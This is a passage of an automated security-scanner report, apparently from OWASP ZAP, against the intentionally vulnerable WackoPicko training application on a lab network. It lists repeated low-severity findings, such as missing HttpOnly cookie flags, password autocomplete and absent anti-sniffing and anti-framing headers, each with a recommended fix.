www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=hmdvkmpt78s0g11idc9id3s8o2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Password Autocomplete in browser

Description

AUTOCOMPLETE attribute is not disabled in HTML FORM/INPUT element containing password type input. Passwords may be stored in browsers and retrieved.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off AUTOCOMPLETE attribute in form or individual input elements containing password by using AUTOCOMPLETE='OFF'

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/passcheck.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/passcheck.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=qpjgsk8us4l50vral51ngb4rf2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555
Parameter
PHPSESSID=1vljoojisdmba2cbi6p1dt3jr1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=ams4005b4lt85uijq7j1ce9ag3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=dhi19to079ulv4k1g6k6g8cvt6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955
Parameter
PHPSESSID=uglpu7h37jrtlfmcpqsn7avp25; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355
Parameter
PHPSESSID=u4mims6bklah44t7ufatmuiak6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755
Parameter
PHPSESSID=lb6u9cdc9gce6no9uop5on59l7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155
Parameter
PHPSESSID=pksol2i7ru6l9pc442ujadkiv7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555
Parameter
PHPSESSID=126fkl17ufn46ub2jqkore52b1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955
Parameter
PHPSESSID=d2uia8euo7u98bs21l9sr27h30; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355
Parameter
PHPSESSID=b61ngeffpbsrebphofvtcfm9j6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755
Parameter
PHPSESSID=k197ba37mfe5lvhp4tgn9phjr0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID=3mohpqirn3nk70a0lm4ske75g4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/home.php
Parameter
PHPSESSID=ldp4qva76rd4ke0pnsaf7aklc7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/upload.php
Parameter
PHPSESSID=5c83beff26riqjtq6bvro1vk31; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php
Parameter
PHPSESSID=4392nvgirojuib83t28os8u6t1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=1mo5jljof4na8tvk4c9vkehm21; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=52amksqtfqudg4eh1jbml937s1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=5j3s7se1hlmegl2it45nv398j7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1
Parameter
PHPSESSID=qg9ipoh1isesuvqsdn6hj4q4e7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php
Parameter
PHPSESSID=6eb9uqu6nd666n0jqihfi071c0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=fteba9bo1n02h7o141ihssc800; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/tos.php
Parameter
PHPSESSID=5evej6j8ho0rq8360hkhm27f60; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15
Parameter
PHPSESSID=pnlm23qlq3vd5ue2pp9dbc1qa5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP
Parameter
PHPSESSID=09q1ejn1ufrtfertf46icr3rm7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14
Parameter
PHPSESSID=2itu2rss1s4shc8vqjndr2cp73; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=13
Parameter
PHPSESSID=v4b3btdaicrs9he0auofj7kli6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=12
Parameter
PHPSESSID=9vdc0gtnjob27mq4e7t2dtaps6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11
Parameter
PHPSESSID=0krgplrptcak9at37aig3s4gl5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=10
Parameter
PHPSESSID=kmrdnsm3pi6mtnhp3tjegpqga6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=9
Parameter
PHPSESSID=nbrnqpesbiqrmjb9afk8mmoqb0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=8
Parameter
PHPSESSID=n9tg7ja8ak6l6eghcfbdq7r137; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=p0u1muql1jjncpu85g1dc3c9h1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=7
Parameter
PHPSESSID=bf1prcesrtampsk6q97a3t5h01; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=ob0v4pahncba1ar6uetpu58414; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=2p836015asgugqva4g3tdei0o0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=bhjkvjmqb6kqgr2jpps7il2sf0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616
Parameter
PHPSESSID=qonl4ojkvrqg43g62jrnca9bd3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-CONTENT-TYPE-OPTIONS if the Content-Type header is unknown

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=ovvaaugjeudalu2egf6c0ok9r7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

